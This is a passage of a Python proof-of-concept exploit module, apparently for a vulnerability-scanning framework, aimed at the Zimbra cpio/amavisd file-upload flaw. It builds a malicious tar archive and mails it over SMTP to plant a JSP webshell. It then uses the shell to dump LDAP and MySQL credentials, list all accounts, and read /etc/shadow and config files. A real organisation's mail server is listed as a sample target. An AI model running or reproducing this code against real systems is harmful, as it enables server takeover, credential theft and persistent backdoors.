    作为邮件服务器系统，Zimbra更是凭借卓越的稳定性和功能当之无愧地成为开源邮件服务器系统的首选，适合各类型/人数的用户群，尤其适合团队使用。
    其最大的特色在于其采用Ajax技术模仿CS桌面应用软件的风格开发的客户端兼容Firefox,Safari和IE浏览器。
    '''
    details = '''
    在Zimbra Collaboration（ZCS）8.8.15 和 9.0中，攻击者可以利用cpio漏洞通过amavisd上传任意文件到web目录/opt/zimbra/jetty/webapps/zimbra/public，从而导致未授权远程代码执行。
    Zimbra建议用户使用pax代替cpio，虽然安装pax是Ubuntu上安装Zimbra的前提条件，但是在RHEL 6（或CentOS 6）之后，Red Hat发行版不再默认安装pax。
    '''
    solution = '''
    要修复此漏洞，请应用最新的修补程序，或者安装pax并重新启动服务器。
    '''
    official_solution = '''
    https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27
    '''
    references = []
    samples = ['https://mail.realclubdelima.org.pe']

    def create_tar_payload(self, payload, payload_name, payload_path, lnk='startup'):
        # Block 1
        link = lnk.encode()
        mode = b'0000777\x00'  # link permissions
        ouid = b'0001745\x00'  # octal uid (997)
        ogid = b'0001745\x00'  # octal gid
        lnsz = b'00000000000\x00'  # file size (link = 0)
        lmod = b'14227770134\x00'  # last modified (octal unix)
        csum = b'        '  # checksum = 8 blanks
        type = b'2'  # type (link = 2)
        targ = payload_path.encode()  # link target
        magi = b'ustar  \x00'  # ustar magic bytes + version
        ownu = b'zimbra'  # user owner
        owng = b'zimbra'  # group owner
        vers = b'\x00' * 8 + b'\x00' * 8  # device major and minor
        pref = b'\x00' * 155  # prefix (only used if the file name length exceeds 100)

        raw_b1_1 = link + b'\x00' * (100 - len(link)) + mode + ouid + ogid + lnsz + lmod
        raw_b1_2 = type + targ + b'\x00' * (100 - len(targ)) + magi + ownu + b'\x00' * (
                    32 - len(ownu)) + owng + b'\x00' * (32 - len(owng)) + vers + pref
        # calculate and insert checksum
        csum = oct(sum(b for b in raw_b1_1 + csum + raw_b1_2))[2:]
        raw_b1 = raw_b1_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b1_2
        # pad block to 512
        raw_b1 += b'\00' * (512 - len(raw_b1))
        # Block 2
        mode = b'0000644\x00'  # file permissions
        file = f'{lnk}/{payload_name}'.encode()
        flsz = oct(len(payload))[2:]  # file size
        csum = b'        '  # checksum = 8 blanks
        type = b'0'  # type (file = 0)
        targ = b'\x00' * 100  # link target = none

        raw_b2_1 = file + b'\x00' * (100 - len(file)) + mode + ouid + ogid + f'{flsz:>011}'.encode() + b'\x00' + lmod
        raw_b2_2 = type + targ + magi + ownu + b'\x00' * (32 - len(ownu)) + owng + b'\x00' * (
                    32 - len(owng)) + vers + pref
        # calculate and insert checksum
        csum = oct(sum(b for b in raw_b2_1 + csum + raw_b2_2))[2:]
        raw_b2 = raw_b2_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b2_2
        # pad block to 512
        raw_b2 += b'\00' * (512 - len(raw_b2))

        # Assemble
        raw_tar = raw_b1 + raw_b2 + payload + b'\x00'*(512-(len(payload)%512))

        raw_tar += b'\x00' * 512 * 2  # Trailer: end with 2 empty blocks

        return raw_tar

    def smtp_send_file(self, target, sender, recipient, subject, body, attachment, attachment_name):
        msg = MIMEMultipart()
        msg['Subject'] = subject
        msg['From'] = sender
        msg['To'] = recipient

        message = MIMEText(body, 'html')
        msg.attach(message)

        att = MIMEApplication(attachment)
        att.add_header('Content-Disposition', 'attachment', filename=attachment_name)
        msg.attach(att)

        try:
            smtp_server = smtplib.SMTP(target, 25)
            smtp_server.sendmail(sender, recipient, msg.as_string())
        except Exception as e:
            pass

    def upload_webshell(self):
        webshell_payload = b"""<%@ page language="java" pageEncoding="UTF-8" %>
<%
    Runtime rt = Runtime.getRuntime();
    String cmd = request.getParameter("sMuw1P2");
    Process process = rt.exec(cmd);
    java.io.InputStream in = process.getInputStream();
    java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);
    java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
    String s = null;
    while ((s = stdInput.readLine()) != null) {
        out.println(s);
    }
%>"""
        self.webshellPass = 'sMuw1P2'
        target = self.host
        webshell_path = '/public/jsp'
        self.webshellName = 'Startup1_3.jsp'
        attachment = 'helloWorld.tar'
        b = str(self.host).split('.')
        domain = ''
        for i in range(1, len(b)):
            if i != len(b) - 1:
                domain = domain + b[i] + '.'
            else:
                domain = domain + b[i]
        recipient = 'admin@' + domain
        email_subject = 'Hello World!'
        email_body = 'Hello World!'
        upload_base = '/opt/zimbra/jetty_base/webapps/zimbra'
        tar = self.create_tar_payload(webshell_payload, self.webshellName, upload_base+webshell_path)
        sender = 'anonymous@' + domain
        self.smtp_send_file(target, sender, recipient, email_subject, email_body, tar, attachment)

    def execute_command(self, command):
        data = {self.webshellPass: command}
        req = requests.post(self.url + '/public/jsp/{}'.format(self.webshellName), data=data, verify=False, allow_redirects=False)
        return req.text

    def check_Vulnerable(self):
        ranStr2echo = random_str(10)
        if ranStr2echo in self.execute_command('echo {}'.format(ranStr2echo)):
            return True
        else:
            return False

    def get_title(self):
        r = requests.get(self.url, verify=False)
        if r.status_code != 200:
            return ''
        pattern = re.compile('<title>(.+)</title>')
        url_title = re.findall(pattern, r.text)
        try:
            return url_title[0]
        except Exception as e:
            return ''

    def get_version(self):
        return self.execute_command('/opt/zimbra/bin/zmcontrol -v')

    def get_ldap_and_mysql_Info(self):
        zmlocalconfig = self.execute_command('/opt/zimbra/bin/zmlocalconfig -s')
        pattern_email = re.compile('av_notify_user = (.*)')
        pattern_ldap_Pass = re.compile('zimbra_ldap_password = (.*)')
        pattern_ladp_username = re.compile('zimbra_ldap_user = (.*)')
        pattern_ldap_url = re.compile('ldap_url = (.*)')
        pattern_mysql_address = re.compile('mysql_bind_address = (.*)')
        pattern_mysql_username = re.compile('zimbra_mysql_user = (.*)')
        pattern_mysql_Pass = re.compile('zimbra_mysql_password = (.*)')
        try:
            ldap_Pass = re.findall(pattern_ldap_Pass, zmlocalconfig)[0]
            ldap_user = re.findall(pattern_ladp_username, zmlocalconfig)[0]
            ldap_url = re.findall(pattern_ldap_url, zmlocalconfig)[0]
            mysql_address = re.findall(pattern_mysql_address, zmlocalconfig)[0]
            mysql_username = re.findall(pattern_mysql_username, zmlocalconfig)[0]
            mysql_Pass = re.findall(pattern_mysql_Pass, zmlocalconfig)[0]
            av_notify_user = re.findall(pattern_email, zmlocalconfig)[0]
            return ldap_url, ldap_user, ldap_Pass, mysql_address, mysql_username, mysql_Pass, av_notify_user
        except Exception as e:
            return '', '', '', '', '', ''

    def GetAllAccountsRequest(self):
        pattern = re.compile('(\S*)')
        users = re.findall(pattern, self.execute_command('/opt/zimbra/bin/zmprov -l gaa'))
        while '' in users:
            users.remove('')
        return users

    def _verify(self):
        requests.packages.urllib3.disable_warnings()
        result = {}
        self.raw_url = self.url
        self.host = urlparse(self.url).hostname
        self.port = urlparse(self.url).port
        if self.port is None:
            self.port = 443
        try:
            self.upload_webshell()
            if self.check_Vulnerable():
                result["url"] = self.url

                ldap_url, ldap_user, ldap_Pass, mysql_address, mysql_username, mysql_Pass, av_notify_user = self.get_ldap_and_mysql_Info()
                # Web网站相关信息
                result["web"] = {
                    # 网站默认首页的title信息（可能含有单位或组织信息）
                    "title": self.get_title(),
                    "version": self.get_version(),
                    "all accounts": self.GetAllAccountsRequest(),
                    # webshell路径及参数名
                    "webshell": {'path': '/zimbraAdmin/{}'.format(self.webshellName),
                                 "password": self.webshellPass},
                    "admin notification emails": av_notify_user
                }
                # 凭据类信息，针对各类弱口令、默认口令漏洞
                result["login_credentials"] = [
                    {"username": ldap_user, "password": ldap_Pass, "ldap_url": ldap_url, "credential_type": "ldap"},
                    {"username": mysql_username, "password": mysql_Pass, "mysql_bind_address": mysql_address,
                     "credential_type": "mysql"}
                ]
                # 获取的文件信息, 针对各类文件读取类漏洞
                result["files"] = [
                    {"name": "passwd", "path": "/etc/passwd", "result": self.execute_command("cat /etc/passwd")},
                    {"name": "hosts", "path": "/etc/hosts", "result": self.execute_command("cat /etc/hosts")},
                    {"name": "shadow", "path": "/etc/shadow", "result": self.execute_command("cat /etc/shadow")},
                    {"name": "resolv,conf", "path": "/etc/resolv.conf",
                     "result": self.execute_command("cat /etc/resolv.conf")},
                    {"name": "localconfig.xml", "path": "/opt/zimbra/conf/localconfig.xml",
                     "result": self.execute_command("cat /opt/zimbra/conf/localconfig.xml")},
                ]
                # 命令执行信息, 针对各类命令执行、代码执行漏洞
                result["commands"] = [
                    {"name": "id", "result": self.execute_command("id")},
                    {"name": "whoami", "result": self.execute_command("whoami")},
                    {"name": "arp", "result": self.execute_command("arp -a")},
                    {"name": "ifconfig", "result": self.execute_command("ifconfig")}
                ]
        except Exception as e:
            pass
        return self.parse_output(result)

    def _attack(self):
        return self._verify()


    def parse_output(self, result):
        output = Output(self)
        if len(result.keys()) != 0:
            json_result = {
                "result": {"json": json.dumps(result)}
            }
            output.success(json_result)
        else:
            output.fail('Internet nothing returned')
        return output


register_poc(PoC)